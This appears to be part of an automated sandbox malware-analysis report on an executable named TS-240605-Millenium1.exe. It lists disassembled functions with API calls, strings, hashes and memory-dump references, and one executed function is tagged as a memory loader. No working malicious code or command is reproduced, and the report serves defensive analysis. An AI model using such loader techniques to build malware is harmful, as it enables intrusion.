Part of subcall function 00007FF6CEB28DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6CEB22A9B), ref: 00007FF6CEB28E1A

MessageBoxW.USER32 ref: 00007FF6CEB22BE5
MessageBoxA.USER32 ref: 00007FF6CEB22C01

Strings

Fatal error detected, xrefs: 00007FF6CEB22BBB, 00007FF6CEB22BF3

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Fatal error detected
API String ID: 1878133881-4025702859
Opcode ID: cc7983d7ddd1ca4fe6b0e820e7fb498cdab092a0274b8afa64f738c4e3f04b3b
Instruction ID: 0e612e120db8560623fd15990ff66036f44d363f7210e2540d4824a24565bf99
Opcode Fuzzy Hash: cc7983d7ddd1ca4fe6b0e820e7fb498cdab092a0274b8afa64f738c4e3f04b3b
Instruction Fuzzy Hash: B621747262868281E720DF10E5556FAA374FFA5785F801136F6CDA7A59DF3CD205CB40

Function 00007FF6CEB30678 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF6CEB306C8
RaiseException.KERNEL32 ref: 00007FF6CEB30709

Strings

csm, xrefs: 00007FF6CEB306F6

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: fd7208e01f832ae2c3cc6aa9bb96c2aefef2cc6e58d8a602234d9daac72df826
Instruction ID: 4750086462ad0d85395d214ea229a9029b73720c174d9e612aafed1093ab2149
Opcode Fuzzy Hash: fd7208e01f832ae2c3cc6aa9bb96c2aefef2cc6e58d8a602234d9daac72df826
Instruction Fuzzy Hash: 8B115B32608B8582EB208F15F60026977F1FB99B95F284231EACD57B69DF3CD551CB00

Function 00007FF6CEB41594 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB415C4
GetDriveTypeW.KERNEL32 ref: 00007FF6CEB41604

Strings

:, xrefs: 00007FF6CEB415ED

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: b3a001ff98c302286219bbad5be65c90682500455353c0d2fccc423422cbb122
Instruction ID: fbd8935f0c35b50a04276e3dbe7a0ba3c228081bb370e2368de154e3b5ca7418
Opcode Fuzzy Hash: b3a001ff98c302286219bbad5be65c90682500455353c0d2fccc423422cbb122
Instruction Fuzzy Hash: E101D422E1C20382F720AF6095522BE63B0EF66749F841036F5CDE6285EF2CE5049B14

Analysis Process: TS-240605-Millenium1.exePID: 7664, Parent PID: 7564COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.9%
Total number of Nodes:	890
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFDFB3C2F20 Relevance: 6.9, APIs: 4, Instructions: 893librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFDFB3C3A35
GetProcAddress.KERNEL32 ref: 00007FFDFB3C3A5F
VirtualProtect.KERNELBASE(?,?,?,00000000), ref: 00007FFDFB3C3AE9
VirtualProtect.KERNEL32 ref: 00007FFDFB3C3B07

Memory Dump Source

Source File: 00000002.00000002.1860975216.00007FFDFB3C2000.00000080.00000001.01000000.00000005.sdmp, Offset: 00007FFDFADE0000, based on PE: true

Associated: 00000002.00000002.1860135349.00007FFDFADE0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1860163508.00007FFDFADE1000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1860163508.00007FFDFB082000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1860163508.00007FFDFB0FB000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1860163508.00007FFDFB13D000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1860163508.00007FFDFB163000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1860163508.00007FFDFB16B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1860163508.00007FFDFB1FD000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1860163508.00007FFDFB200000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1860163508.00007FFDFB309000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1860163508.00007FFDFB349000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1860163508.00007FFDFB353000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1860163508.00007FFDFB3B6000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1861001417.00007FFDFB3C4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffdfade0000_TS-240605-Millenium1.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID:
API String ID: 3300690313-0
Opcode ID: 783ab60674f12aabdfa355631bc5dc6fdb0c5fd1704f4c1a21f8aa46b8a7e156
Instruction ID: f7890658c2b14ecb5618cbbdf607c5f6c953f89dd738d14771dc647cc5a3a946
Opcode Fuzzy Hash: 783ab60674f12aabdfa355631bc5dc6fdb0c5fd1704f4c1a21f8aa46b8a7e156
Instruction Fuzzy Hash: 726236A272D19287E7159E78D410BBD76E0F748785F045136EAAEC37D8EA3CEA45CB00

Non-executed Functions

Function 00007FFE1A4594B8 Relevance: 58.1, APIs: 4, Strings: 29, Instructions: 382
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A459A29
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A459A5E
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A459A97

Strings

const, xrefs: 00007FFE1A459887
this , xrefs: 00007FFE1A459971
bool, xrefs: 00007FFE1A459780
char, xrefs: 00007FFE1A459588
char16_t, xrefs: 00007FFE1A4597B8
UNKNOWN, xrefs: 00007FFE1A45992C
void, xrefs: 00007FFE1A45961C
<unknown>, xrefs: 00007FFE1A4597CA
__int16, xrefs: 00007FFE1A4596C0
char32_t, xrefs: 00007FFE1A4599AB
auto, xrefs: 00007FFE1A4597EB
wchar_t, xrefs: 00007FFE1A45994A
__int128, xrefs: 00007FFE1A459750
volatile, xrefs: 00007FFE1A4598CF
short, xrefs: 00007FFE1A459576
volatile, xrefs: 00007FFE1A4598A2
unsigned , xrefs: 00007FFE1A4599E6
char8_t, xrefs: 00007FFE1A4597D9
decltype(auto), xrefs: 00007FFE1A459900
float, xrefs: 00007FFE1A45960A
long , xrefs: 00007FFE1A4595C7
__int8, xrefs: 00007FFE1A4596D2
int, xrefs: 00007FFE1A459564
double, xrefs: 00007FFE1A4595DE
signed , xrefs: 00007FFE1A4599F6
__int64, xrefs: 00007FFE1A45975F
__w64 , xrefs: 00007FFE1A4596FC
long, xrefs: 00007FFE1A459552
__int32, xrefs: 00007FFE1A45976E

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: Name::operator+
String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
API String ID: 2943138195-1482988683
Opcode ID: 9af3000e46094686c92b09a1ab6ba282d3ea35f814097fcec630d6e6c72122d6
Instruction ID: 5c88346a1f5f333869e985466dc0456801a4d5599bf480a8075749a0f3c82d9e
Opcode Fuzzy Hash: 9af3000e46094686c92b09a1ab6ba282d3ea35f814097fcec630d6e6c72122d6
Instruction Fuzzy Hash: 810262B6F18E1288FB14AB66D9501FC27B1BB06B64F5441F7CA0D93ABADF2C9564C340

Function 00007FFE1A45CDBC Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45CE4D
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45CE86
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45CF5A
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45CF6B
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45CFCE
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45CFDE
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45D02A
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45D03C
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45D1B1

Part of subcall function 00007FFE1A45ED94: Replicator::operator[].LIBVCRUNTIME ref: 00007FFE1A45EDEE

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45D233
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45D242

Strings

`anonymous namespace', xrefs: 00007FFE1A45D10E

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: Name::operator+$Replicator::operator[]
String ID: `anonymous namespace'
API String ID: 3863519203-3062148218
Opcode ID: c2c563be3abc2cd025459880134dd91d33137c93c5547e13454a58e5101b2a40
Instruction ID: b0aecc6a5b2ee625eb65b6c04eb6cd1c2b65b4eb29808fc0c3c241776bc2e4aa
Opcode Fuzzy Hash: c2c563be3abc2cd025459880134dd91d33137c93c5547e13454a58e5101b2a40
Instruction Fuzzy Hash: A2E16DB2B08F8299EB10EF26D8801BD77A0FB45B58F4081B6EA8D17B65DF38D565C700

Function 00007FFE1A45DC24 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 359
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFE1A4590F4), ref: 00007FFE1A45E08A
DName::DName.LIBVCRUNTIME ref: 00007FFE1A45E0C9
swprintf_s.PGOCR ref: 00007FFE1A45E0E9
DName::DName.LIBVCRUNTIME ref: 00007FFE1A45E0F9
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45E149

Strings

`template-type-parameter-, xrefs: 00007FFE1A45E16A
nullptr, xrefs: 00007FFE1A45DE0D
lambda, xrefs: 00007FFE1A45DFE8
`generic-class-parameter-, xrefs: 00007FFE1A45E15A
`generic-method-parameter-, xrefs: 00007FFE1A45E116
NULL, xrefs: 00007FFE1A45DCF1

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: NameName::$Name::operator+atolswprintf_s
String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
API String ID: 2331677841-2441609178
Opcode ID: 04052d8e5626c1f24672c52f4d573e3506f88365006a7f318b5907256fbad706
Instruction ID: 93562e20a7cb230eb50f8f01d2e8e48d429b6c114f72410326a843cfe3031cc9
Opcode Fuzzy Hash: 04052d8e5626c1f24672c52f4d573e3506f88365006a7f318b5907256fbad706
Instruction Fuzzy Hash: 3FF1AEE2F08E1284FB25FB66D5551BC27A1AF45F64F4040F7CA4E16AB6DF3CA5698300

Function 00007FFE1A45B280 Relevance: 19.9, APIs: 13, Instructions: 361
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45B2D1
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45B39A
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45B3E3
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45B3F4

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 9a3856515ab70ac0cbef49cb78169d28014df4ca819d0bec0dbbb0bc7461e156
Instruction ID: 2e7bae8358ff074180c73b1976c0d414eba33ed367bfbf5dccadc2b75fdc8e4b
Opcode Fuzzy Hash: 9a3856515ab70ac0cbef49cb78169d28014df4ca819d0bec0dbbb0bc7461e156
Instruction Fuzzy Hash: 62F1AEB6B08A829EF711EF66D4501FC37B0EB04B5CB4044B3EA4D57AA9EE38D566C740

Function 00007FFE1A453334 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 309
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FFE1A453390

Part of subcall function 00007FFE1A455768: __GetUnwindTryBlock.LIBCMT ref: 00007FFE1A4557AB
Part of subcall function 00007FFE1A455768: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FFE1A4557D0

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE1A453468
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A453475
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FFE1A4536B9
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4536E7

Part of subcall function 00007FFE1A456E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4529EE), ref: 00007FFE1A456E56

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4537AD
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE1A4537E2

Strings

csm, xrefs: 00007FFE1A453411
csm, xrefs: 00007FFE1A45348D
csm, xrefs: 00007FFE1A4533AA

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: BlockFrameHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 4223619315-393685449
Opcode ID: dcb3548c504605ccad87c1df068e82445ce8bfed626f824eb2c4e809fdb80efd
Instruction ID: e48452420167fd4016481dcbd2d7482d51d7b7028674ea83e554c8d18ca61680
Opcode Fuzzy Hash: dcb3548c504605ccad87c1df068e82445ce8bfed626f824eb2c4e809fdb80efd
Instruction Fuzzy Hash: FFD1B3B2B08B4186EB60AF66D4502BD77A0FB45FA8F1041B6EE4D57B65DF38E1A0C700

Function 00007FFE1A45ED94 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 192
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Replicator::operator[].LIBVCRUNTIME ref: 00007FFE1A45EDEE

Strings

template-parameter-, xrefs: 00007FFE1A45EE50
`template-parameter-, xrefs: 00007FFE1A45EE83
`generic-type-, xrefs: 00007FFE1A45EECA
generic-type-, xrefs: 00007FFE1A45EE97

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: Replicator::operator[]
String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
API String ID: 3676697650-3207858774
Opcode ID: 73310b6c18e80224c33410df5d9c8b136be81ee7f088e8962b8740eac16092a6
Instruction ID: b5c5640df7dcb937c0033f08ff8f980e5b36e6882d1b4293bf9711aad441de39
Opcode Fuzzy Hash: 73310b6c18e80224c33410df5d9c8b136be81ee7f088e8962b8740eac16092a6
Instruction Fuzzy Hash: A591AEA2B18E8699FB21EF22D4512B833B1AB54F68F4481F3DA5D036A5DF3CE565C340

Function 00007FFE1A459164 Relevance: 16.7, APIs: 11, Instructions: 158
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A4591CC
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A4592C9
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A459322
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45934E
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A459360
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45938F

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 3cac31fbce2037cca8b65a6457a1f6e1f72e09754060cc87a73fdfbcf94b07ef
Instruction ID: 6fb72a7b33907f36b10538f7b77f9c94779bffe61cc6cabd7b9bce20e22d6a9b
Opcode Fuzzy Hash: 3cac31fbce2037cca8b65a6457a1f6e1f72e09754060cc87a73fdfbcf94b07ef
Instruction Fuzzy Hash: 797140B2B05E46ADFB11EF62D4501FC33B1AB45B9CB4048B2DA0D57AAADF34D625C390

Function 00007FFE1A45AAC8 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 126
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45AB22
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45AC58

Strings

coclass , xrefs: 00007FFE1A45AC11
union , xrefs: 00007FFE1A45AC85
enum , xrefs: 00007FFE1A45AC35
`unknown ecsu', xrefs: 00007FFE1A45AAEE
cointerface , xrefs: 00007FFE1A45ABFF
struct , xrefs: 00007FFE1A45AC7C
class , xrefs: 00007FFE1A45AC6D

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: Name::operator+
String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
API String ID: 2943138195-1464470183
Opcode ID: 50e8110e92645124a6d82ffc9330fdaa6dc52167fa44e73d911cd3f80f86a47a
Instruction ID: 6fc5acf3494eeb3f8701cc411fabb80c64b441b178f4a56e7a5f9de271fbf314
Opcode Fuzzy Hash: 50e8110e92645124a6d82ffc9330fdaa6dc52167fa44e73d911cd3f80f86a47a
Instruction Fuzzy Hash: 89518CB2F08F52C9FB11EB66E8841BC27B1BB05B64F5040F6DA5D13AA9DF28E564C340

Function 00007FFE1A4537F8 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 317
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE1A453996
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4539A3

Part of subcall function 00007FFE1A456E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4529EE), ref: 00007FFE1A456E56

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A453C57
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A453CA2
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE1A453CD7

Strings

csm, xrefs: 00007FFE1A4538DD
csm, xrefs: 00007FFE1A4539BF
csm, xrefs: 00007FFE1A45393F

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 211107550-393685449
Opcode ID: aad8d4203d0b1849c4fce47835e3c613ec0ba3b35d99662ed70f641d37e67567
Instruction ID: 84db0f3033635d0a868e712f29b609f6a017eeff5fc66594e5dbf62a63eb592f
Opcode Fuzzy Hash: aad8d4203d0b1849c4fce47835e3c613ec0ba3b35d99662ed70f641d37e67567
Instruction Fuzzy Hash: 60E1D2B3B08B828AE751AF36D4903BD77A0FB45B68F1401B6DA4D57666CF38E5A1C700

Function 00007FFE1A45C7F8 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C9AC

Part of subcall function 00007FFE1A4594B8: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A459A29
Part of subcall function 00007FFE1A4594B8: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A459A5E

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C95E

Strings

std::nullptr_t, xrefs: 00007FFE1A45C8D7
void, xrefs: 00007FFE1A45C842
cli::pin_ptr<, xrefs: 00007FFE1A45C975
std::nullptr_t , xrefs: 00007FFE1A45C8EA
cli::array<, xrefs: 00007FFE1A45C92B
void , xrefs: 00007FFE1A45C86A

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: Name::operator+
String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
API String ID: 2943138195-2239912363
Opcode ID: 0e84257edd8271f32b759845b73cd3eefe07970f5e22a962a9d02e38f5861642
Instruction ID: a50961141b2aa76dd593645c823cb9b5a686f9e17db93be2c79e1738c74976c0
Opcode Fuzzy Hash: 0e84257edd8271f32b759845b73cd3eefe07970f5e22a962a9d02e38f5861642
Instruction Fuzzy Hash: C2513BA2F18F5298FB519B62D8402BD37B0BB08B68F4442F7DA4D13AA5DF3C91A4C754

Function 00007FFE1A45662A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162
COMMON

